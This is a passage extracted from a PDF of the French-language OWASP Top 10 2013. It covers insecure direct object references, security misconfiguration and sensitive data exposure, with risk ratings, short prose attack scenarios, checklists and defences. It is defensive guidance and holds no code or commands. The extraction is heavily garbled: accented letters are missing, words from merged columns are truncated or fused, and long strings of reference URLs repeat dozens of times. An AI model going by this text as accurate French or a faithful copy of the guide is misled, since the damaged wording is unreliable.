Pour une liste de contrles additionnels, consultez le guiASVS requirements area for Access Control (V4).
Externes
CWE Entry 639 on Insecure Direct Object ReferencesCWE Entry 22 on Path Traversal(qui est un exempledattaque sur des rfrences directes non scurises)
Comment senprmunir?Afin dviterles rfrences directes non scurises il conde suivre une approche permettant de protger chaquemis disposition des utilisateurs (ex : nom de fichier, etc
1. Implmenter des rfrences indirectes, par utilisou par session. Cela empche lattaquant de ciblressources interdites. Par exemple, au lieu dutiliserde lobjeten base de donnes, une liste droulante objets autoriss pour lutilisateur pourrait sappuy
les chiffres 1 6 pour indiquer la valeur chLapplication doit associer la rfrence indirectutilisateur la valeur relle de la cl sur le servelibrairie ESAPI de lOWASP propose des mtfacilitant limplmentationdes rfrences indirectes
2. Contrler laccs. Chaque sollicitation dune rfdirecte par une entit non fiable doit inclure un codaccs permettant de sassurer que lutilisatequestion est bien autoris accder lobjetdeman
Rfrences directes nonscurises un objetA4
VulnrabilitVecteursdattaque
ImpactsTechniques
ImpactsMtier
Agents de menace
http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.htmlhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Command_Injectionhttp://cwe.mitre.org/data/definitions/639.htmlhttp://cwe.mitre.org/data/definitions/22.htmlhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttps://www.owasp.org/index.php/ESAPIhttp://cwe.mitre.org/data/definitions/22.htmlhttp://cwe.mitre.org/data/definitions/639.htmlhttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/ASVShttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttp://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.htmlhttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttp://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference5/26/2018 OWASP Top 10 - 2013 - French
11/22
SpcifiqueApplication
ExploitabilitSIMPLE
PrvalenceCOMMUNE
DtectabilitFACILE
ImpactMODERE
SpcifiquApplication/M
Considrez desattaquants externesanonymes, ou desutilisateurslgitimes peuventtenter decompromettre lesystme.Considrez aussides internes voulant
dissimuler leursactes.
Attaquant accdant des comptes pardfaut, pages nonutilises,vulnrabilits noncorriges, fichiers etrpertoires nonprotgs, etc. Afindobtenirdes accsnon autoriss ou
des informationssur le systme.
Une mauvaise configuration de scuritpeut survenir sur lensembledes couches,la plateforme, le serveur web, le serveurdapplication, le Framework et le codespcifique. Dveloppeurs etadministrateurs system ont besoin detravailler ensemble pour sassurequelensembledes couches sont configurecorrectement. Les scanners automatisssont utiles pour dtecter les patchs
manquants, erreur de configuration,comptes par dfaut, services inutiles, etc.
Cette vulnrabilitdonne souvent auxattaquants desaccs non autoriss des systmes oudes fonctionnalits.Occasionnellement,ces vulnrabilitsentrainent unecompromission
complte dusystme.
Le systme petre compromsans le savoir.Lensemblededonnes peutdrob ou molentement datemps. Les corcuprationpeuvent tre
levs.
Exemple de scnarios dattaqueScnario #1: La console dadministration du serveur
dapplication est automatiquement installe et nondsactive. Les comptes par dfaut ne sont pas modifis.Lattaquantdcouvre la console , utilise le compte par dfautet prend le contrle.
Scnario #2: Le listage des rpertoires est activ. Lattaquantle dcouvre et peut lister les rpertoires et trouver lesfichiers. Lattaquant trouve et tlcharge vos classes javacompiles quildcompile . Il identifie une faille de contrledaccs.
Scnario #3: La configuration du serveur dapplicationautorise laffichage dtat de la pile lutilisateur. Lesattaquants apprcient ces messages derreurs.
Scnario #4: Le serveur dapplication est livr avec desexemples dapplications non supprims de votre serveur deproduction. Ledit exemple dapplication contient desvulnrabilits connues utilisables par lattaquant pourcompromettre le serveur.
Suis-je vulnrable?Avez-vous effectu le durcissement de scurit appropri surlensembledes couches de lapplication? incluent
1. Est-ce que vos logiciels sont jour ? OS, Web/App Server,BE, applications, et lensemble des librairies de code(Voir nouveau point A9).
2. Y-a-tildes fonction inutiles actives/installes(ex : ports,services, pages, comptes, privilges)?
3. Les mots de passe par dfaut sont activs et inchangs ?4. Affichez-vous ltatde la paile et des messages derreurs
aux utilisateurs ?
5. La configuration scurit des frameworks dedveloppement(Ex : Struts, Spring, ASP.NET) ne sont pasconfigurs avec des valeurs scurises ?
Sans processus de configuration reproductible concert, lessystmes sont exposs .
RfrencesOWASP
OWASP Development Guide: Chapter on Configuration
OWASP Code Review Guide: Chapter on Error Handling
OWASP Testing Guide: Configuration Management
OWASP Testing Guide: Testing for Error Codes
OWASP Insecure Configuration Management
Pour plus dinformations, il est possible de consulterrequirements area for Security Configuration (V12).
Externes
PC Magazine Article on Web Server Hardening
CWE Entry 2 on Environmental Security Flaws
CIS Security Configuration Guides/Benchmarks
Comment senprmunir?La recommandation principale est de mettre en place topoints suivants
1. Un processus de durcissement reproductible qui pun dploiement rapide et facile dun nenvironnement correctement verrouill. Dev, QA etdevraient tre configurs identiquement(hors accprocessus devrait tre automatis pour minimiseefforts de configuration dunnouvel environnement
2. Un processus dinformation et de dploiemennouvelles versions et de correctifs dans un temps dans chaque environnement. Ceci inclut le codlibrairies ( Voir nouveau point A9).
3. Une architecture solide qui apporte une sparatiscurit entre les composants.
4. Utiliser les scans et les audits aident la dtectiofutures mauvaises configurations ou absencecorrectifs.
Mauvaise configuration ScuritA5Vulnrabilit
Vecteursdattaque
ImpactsTechniques
ImpactsMtier
Agents de menace
http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referencehttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Command_Injectionhttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://cwe.mitre.org/data/definitions/2.htmlhttp://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://benchmarks.cisecurity.org/downloads/benchmarks/http://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://cwe.mitre.org/data/definitions/2.htmlhttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.pcmag.com/article2/0,2817,11525,00.asphttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Insecure_Configuration_Managementhttps://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)https://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Testing_for_configuration_managementhttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Error_Handlinghttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttps://www.owasp.org/index.php/Configurationhttp://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference5/26/2018 OWASP Top 10 - 2013 - French
12/22
SpcifiqueApplication
ExploitabilitDIFFICILE
PrvalencePEU COMMUNE
DtectionMOYENNE
ImpactSEVERE
SpcifiquApplication/M
Considrer toutacteur interne ouexterne ayant accsdirect aux donnessensibles (en m-moire, dans desfichiers, dans lessauvegardes, etc.)ou un rseau parlequel elles
transitent.
La cryptanalyse(cassage de lalgo-rithme ou de la cl)reste rare. Onprfre obtenir lescls, intercepter letrafic ou accderaux donnes enclair directementsur le serveur ou
dans le navigateur.
La principale erreur est de ne pas chiffrerles donnes sensibles. Les autres erreursfrquentes sont: gnration de clsfaibles, choix et configuration incorrectsdes algorithmes et protection insuffisantedes mots de passe. Les faiblesses dans lenavigateur sont rpandues et simples dtecter mais difficiles exploiter. Engnral, les faiblesses cryptographiquessont plus difficiles identifier et exploiter
de lextrieur, en raison dun accs limit.
Lexploitationpeutrsulter en lacompromission oula perte de donnespersonnelles, mdi-cales, financires,dlments decartes de crdit oudauthentification,etc.
Considrer la conomique ddonnes perdlimpact potenpour la rputade lorganisatainsi que lesimplications lpouvant rsulleur perte ou
diffusion.
Exemples de scnarios dattaque
Scnario #1: Un site web protge des numros de carte decrdit au moyen dune fonction de chiffrement transparent(TDE) du SGBD. Cette mthode induit galement undchiffrement transparent des donnes lorsquelles quittentla base. En exploitant une injection SQL, lattaquantrcupreainsi les donnes en clair
Scnario #2: Un site public ne requiert pas SSL lors de lanavigation dans la section authentifie. Un acteur malveillantse connecte un rseau sans-fil en libre accs et collecte letrafic d'un utilisateur. Il rcupre le jeton d'une sessionauthentifie et accde ainsi aux donnes et privilges del'utilisateur dans lapplication.
Scnario #3: En exploitant une faille dans une fonctiondenvoi de fichiers, un acteur malveillant obtient la base decondenss (hashs) de mots de passe. Les condenss ayant tgnrs sous la forme simple sans sel (salt), une attaque partable arc-en-ciel (rainbow table) lui rvle les mots de passe.
Suis-je vulnrable?Dterminer dabordquelles donnes doivent bnficier duneprotection cryptographique (mots de passe, donnes patient,numros de cartes, donnes personnelles, etc.), lors de leurtransfert et/ou leur stockage. Pour chacune de ces donnes:
1. Les donnes sont-elles stockes/archives en clair?Quenest-il des sauvegardes?
2. Les donnes circulent-elles en clair? Sur le rseauinterne? Externe? Et sur Internet? (trs risqu)
3. Des algorithmes faibles ou dsuets sont-ils utiliss?
4. Les cls sont-elles robustes? Leur gestion et rotationsont-elles prises en charge?
5. Les rponses transmises au navigateur incluent-elles lesdirectives/en-ttes de scurit adquats?
Pour une liste complte de contrles, se rfrer lASVS:Crypto (V7), Data Protection. (V9), SSL (V10)
Rfrences
OWASP Recommandations et contrles du rfrASVS: Cryptography (V7), Data Protection (V9)Communications Security (V10)
OWASP Cryptographic Storage Cheat Sheet
OWASP Password Storage Cheat Sheet
OWASP Transport Layer Protection Cheat Sheet
OWASP Testing Guide: Chapter on SSL/TLS Testing
Externes
CWE 310 : Cryptographic Issues
CWE 312 : Cleartext Storage of Sensitive InformationCWE 319 : Cleartext Transmission of Sensitive Informat
CWE 326 : Weak Encryption
Comment s'en prmunir?Lintgralitdes cueils lis lusagede la cryptographdu transport et stockage de donnes sensibles dpasprimtre du Top 10. Au minimum, lonveillera toutefoi
1. Identifier les menaces contre lesquelles lon souhaprotger (ex.: menace interne, utilisateurs externsassurer que les donnes sensibles sont chicorrectement lors de leur stockage et de leur transp
2. Ne conserver que les donnes sensibles ncessairedonnes que lonne possde pas ne peuvent tre vo
3. Choisir des algorithmes prouvs et gnrer derobustes. S'assurer qu'une gestion des cls est en Privilgier des modules cryptographiques certifis.
4. Stocker les mots de passe au moyen dun algoradapt cet usage, tel que bcrypt, PBKDF2, or scryp
5. Dsactiver la mise en cache et l'attribut "autocomdans les formulaires collectant des donnes sensible
Exposition de donnes sensiblesA6Vulnrabilit
VecteursdAttaque
ImpactsTechniques
ImpactsMtier
Agents de menace
https://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storagehttps://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storagehttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttps://www.owasp.org/index.php/ASVShttp://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storagehttps://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheethttps://www.owasp.org/index.php/Password_Storage_Cheat_Sheethttps://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheethttps://www.owasp.org/index.php/Testing_for_SSL-TLShttp://www.owasp.org/index.php/Command_Injectionhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://en.wikipedia.org/wiki/Bcrypthttp://en.wikipedia.org/wiki/PBKDF2http://en.wikipedia.org/wiki/PBKDF2http://en.wikipedia.org/wiki/Scrypthttp://en.wikipedia.org/wiki/Bcrypthttp://en.wikipedia.org/wiki/PBKDF2http://en.wikipedia.org/wiki/Scrypthttp://en.wikipedia.org/wiki/Scrypthttp://en.wikipedia.org/wiki/PBKDF2http://en.wikipedia.org/wiki/PBKDF2http://en.wikipedia.org/wiki/Bcrypthttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/326.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/319.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/312.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://cwe.mitre.org/data/definitions/310.htmlhttp://www.owasp.org/index.php/Command_Injectionhttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Testing_for_SSL-TLShttps://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheethttps://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheethttps://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheethttps://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheethttps://www.owasp.org/